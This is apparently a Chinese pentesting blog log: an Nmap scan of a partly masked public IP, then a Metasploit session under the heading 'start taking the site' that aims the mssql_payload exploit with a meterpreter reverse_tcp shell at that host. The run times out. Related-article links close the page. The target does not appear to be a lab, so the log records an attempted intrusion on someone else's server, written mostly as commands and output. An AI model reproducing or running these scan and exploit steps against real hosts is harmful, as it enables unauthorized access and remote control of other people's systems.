扫描一下

Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2011-05-06 09:36 中国标准时间

NSE: Loaded 49 scripts for scanning.

Initiating Ping Scan at 09:36

Scanning 203.171.239.* [4 ports]

Completed Ping Scan at 09:36, 0.90s elapsed (1 total hosts)

Initiating Parallel DNS resolution of 1 host. at 09:36

Completed Parallel DNS resolution of 1 host. at 09:36, 0.03s elapsed

Initiating SYN Stealth Scan at 09:36

Scanning 203.171.239.* [1000 ports]

Discovered open port 3389/tcp on 203.171.239.*

Discovered open port 80/tcp on 203.171.239.*

Discovered open port 3306/tcp on 203.171.239.*

Discovered open port 21/tcp on 203.171.239.*

Completed SYN Stealth Scan at 09:36, 33.18s elapsed (1000 total ports)

Initiating Service scan at 09:36

Scanning 4 services on 203.171.239.*

Completed Service scan at 09:37, 6.07s elapsed (4 services on 1 host)

Initiating OS detection (try #1) against 203.171.239.*

Retrying OS detection (try #2) against 203.171.239.*

Initiating Traceroute at 09:37

Completed Traceroute at 09:37, 0.06s elapsed

Initiating Parallel DNS resolution of 1 host. at 09:37

Completed Parallel DNS resolution of 1 host. at 09:37, 0.03s elapsed

NSE: Script scanning 203.171.239.*.

NSE: Starting runlevel 1 (of 1) scan.

Initiating NSE at 09:37

Completed NSE at 09:37, 5.22s elapsed

NSE: Script Scanning completed.

Nmap scan report for 203.171.239.*

Host is up (0.043s latency).

Not shown: 994 filtered ports

PORT STATE SERVICE VERSION

21/tcp open ftp Microsoft ftpd

25/tcp closed smtp

80/tcp open http Microsoft IIS httpd

|_http-methods: No Allow or Public header in OPTIONS response (status code 400)

|_html-title: Site doesn't have a title (text/html).

110/tcp closed pop3

3306/tcp open mysql MySQL 5.1.32-community

| mysql-info: Protocol: 10

| Version: 5.1.32-community

| Thread ID: 30457

| Some Capabilities: Long Passwords, Connect with DB, Compress, ODBC, Transactions, Secure Connection

| Status: Autocommit

|_Salt: <*[k+0O~O" target=_blank>B@Y";By^J5k<*[k+0O~O

3389/tcp open microsoft-rdp Microsoft Terminal Service

Device type: general purpose|media device

Running (JUST GUESSING) : Microsoft Windows 2003|XP (93%), Motorola Windows PocketPC/CE (85%)

Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows Server 2003 SP1 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows XP Professional SP3 (85%), Microsoft Windows XP SP2 (85%), Microsoft Windows XP SP3 (85%), Motorola VIP1216 digital set top box (Windows CE 5.0) (85%)

No exact OS matches for host (test conditions non-ideal).

Network Distance: 1 hop

TCP Sequence Prediction: Difficulty=262 (Good luck!)

IP ID Sequence Generation: Busy server or unknown class

Service Info: OS: Windows

TRACEROUTE (using port 25/tcp)

HOP RTT ADDRESS

1 50.00 ms 203.171.239.*

Read data files from: D:\metasploit\Nmap

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 54.32 seconds

Raw packets sent: 2095 (95.768KB) | Rcvd: 251 (223.649KB)

开始拿站

Welcome to the Metasploit Web Console!

_ _

_ | | (_)_

____ ____| |_ ____ ___ ____ | | ___ _| |_

| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)

| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__

|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)

|_|

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]

+ -- --=[ 566 exploits - 283 auxiliary

+ -- --=[ 210 payloads - 27 encoders - 8 nops

=[ svn r9834 updated 296 days ago (2010.07.14)

Warning: This copy of the Metasploit Framework was last updated 296 days ago.

We recommend that you update the framework at least every other day.

For information on updating your copy of Metasploit, please see:

http://www.metasploit.com/redmine/projects/framework/wiki/Updating

>> use windows/mssql/mssql_payload

>> info windows/mssql/mssql_payload

Name: Microsoft SQL Server Payload Execution

Version: 9669

Platform: Windows

Privileged: No

License: Metasploit Framework License (BSD)

Rank: Excellent

Provided by:

David Kennedy "ReL1K" <kennedyd013@gmail.com>

jduck <jduck@metasploit.com>

Available targets:

Id Name

-- ----

0 Automatic

Basic options:

Name Current Setting Required Description

---- --------------- -------- -----------

PASSWORD no The password for the specified username

RHOST yes The target address

RPORT 1433 yes The target port

USERNAME sa no The username to authenticate as

UseCmdStager true no Wait for user input before returning from exploit

VERBOSE false no Enable verbose output

Payload information:

Description:

This module will execute an arbitrary payload on a Microsoft SQL

Server, using the Windows debug.com method for writing an executable

to disk and the xp_cmdshell stored procedure. File size restrictions

are avoided by incorporating the debug bypass method presented at

Defcon 17 by SecureState. Note that this module will leave a

metasploit payload in the Windows System32 directory which must be

manually deleted once the attack is completed.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-0402

http://www.osvdb.org/557

http://www.securityfocus.com/bid/1281

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-1209

http://www.osvdb.org/15757

http://www.securityfocus.com/bid/4797

http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf

>> use windows/mssql/mssql_payload

>> set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

>> show options

Module options:

Name Current Setting Required Description

---- --------------- -------- -----------

PASSWORD no The password for the specified username

RHOST yes The target address

RPORT 1433 yes The target port

USERNAME sa no The username to authenticate as

UseCmdStager true no Wait for user input before returning from exploit

VERBOSE false no Enable verbose output

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique: seh, thread, process

LHOST yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Automatic

>> set RHOST 203.171.239.*

RHOST => 203.171.239.*

>> set LHOST 172.16.2.101

LHOST => 172.16.2.101

>> exploit

[*] Started reverse handler on 172.16.2.101:4444

[-] Exploit failed: The connection timed out (203.171.239.*:1433).

[*] Exploit completed, but no session was created.

渗透杂记-2013-07-13 windows/mssql/mssql_payload的更多相关文章

  1. kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail

    kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail 相关链接:https://www.bbsmax.com/A/xl569l20Jr/ http://4hou.win/wordp ...

  2. http://www.cnblogs.com/younggun/archive/2013/07/16/3193800.html

    http://www.cnblogs.com/younggun/archive/2013/07/16/3193800.html

  3. SharePoint 2013中修改windows 活动目录(AD)域用户密码的WebPart(免费下载)

    前段时间工作很忙,好久没更新博客了,趁国庆休假期间,整理了两个之前积累很实用的企业集成组件,并在真正的大型项目中经受住了考验:.Net版SAP RFC适配器组件和SharePoint 2013修改AD ...

  4. http://www.ruanyifeng.com/blog/2013/07/gpg.html

    http://www.ruanyifeng.com/blog/2013/07/gpg.html

  5. 多线程博文地址 http://www.cnblogs.com/nokiaguy/archive/2008/07/13/1241817.html

    http://www.cnblogs.com/nokiaguy/archive/2008/07/13/1241817.html

  6. <2013 07 31> 没有必然的理由

    <2013 07 31> 没有必然的理由 没有必然的理由 人类从野蛮走向文明 也可能,从野蛮走向更野蛮 没有必然的理由 人群从疯狂走向理智 也可能,从疯狂走向更疯狂 没有必然的理由 你我从 ...

  7. 渗透杂记-2013-07-13 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7

    Welcome to the Metasploit Web Console! | | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ ...

  8. 小白日记17:kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail

    缓冲区溢出实例 缓冲区溢出原理:http://www.cnblogs.com/fanzhidongyzby/archive/2013/08/10/3250405.html 空间存储了用户程序的函数栈帧 ...

  9. SAP ERP 6.0 EHP7 SR2(WINDOWS MSSQL版)安装说明

    原文 by 枫竹丹青 ⋅ 1.安装准备 1.1.版本说明 本文是描述在一个Windows虚拟机.SQL Server数据库环境下,安装SAP ERP 6.0 EHP7 SR2服务器,安装完成虚拟机文件 ...

随机推荐

  1. (一)在Windows下编译扩展OpenCV 3.1.0 + opencv_contrib 及一些问题

    一.准备工作: 1.下载OpenCV安装包:https://github.com/opencv/opencv 安装过程实际上就是解压过程,安装完成后得到(这里修改了文件名): 2.下载opencv_c ...

  2. 16C554(8250)驱动分析

    参考: http://www.cnblogs.com/zym0805/p/4815041.html 一. 硬件数据手册 The ST16C554D is a universal asynchronou ...

  3. Contributing to the C++ Core Guidelines

    Contributing to the C++ Core Guidelines "Within C++ is a smaller, simpler, safer language strug ...

  4. mapreduce性能提升2

    mapreduce性能提升2mapreduce性能提升2mapreduce性能提升2

  5. LeetCode: Queue Reconstruction by Height

    这题的关键点在于对数组的重排序方法,高度先由高到低排列不会影响第二个参数,因为list.add的方法在指定index后面插入,因此对于同高的人来说需要对第二个参数由低到高排,具体代码如下 public ...

  6. JavaWeb-spring

    Java反射机制 import java.lang.reflect.Constructor; import java.lang.reflect.Method; public class Reflect ...

  7. TortoiseGit上传项目到GitHub////////////////////////////z

    1.安装msysgit和TortoiseGit : 2.TortoiseGit 设置: (1).确保安装成功: (2).设置用户名和邮箱: 3.登陆github并进入设置页面: 4.添加 SSH Ke ...

  8. 手贱的回忆录 --- L版openrc密码修改(OS_PASSWORD)

    ---恢复内容开始--- 刚刚部署完L版,发现默认登录的管理员账号在41.42.43的openrc文件中,登录名是admin,登录密码却是一串随机码,于是想修改一个简单易记的密码,手贱的把OS_PAS ...

  9. 引用iScroll.js实现上拉和下拖刷新

    使用技巧 1.引用iScroll.js, 在初始化时添加两个事件监听:touchMove.DOMContentLoaded. 2.实现iScroll插件的onScrollEnd事件, 也就是在这个事件 ...

  10. Db2数据库的备份和恢复

    DB2数据库备份与恢复 1.    备份 1.1离线备份(必须在数据库所在PC机进行操作) STEP 1 连接到要备份的数据库 C:\Documents and Settings\Administra ...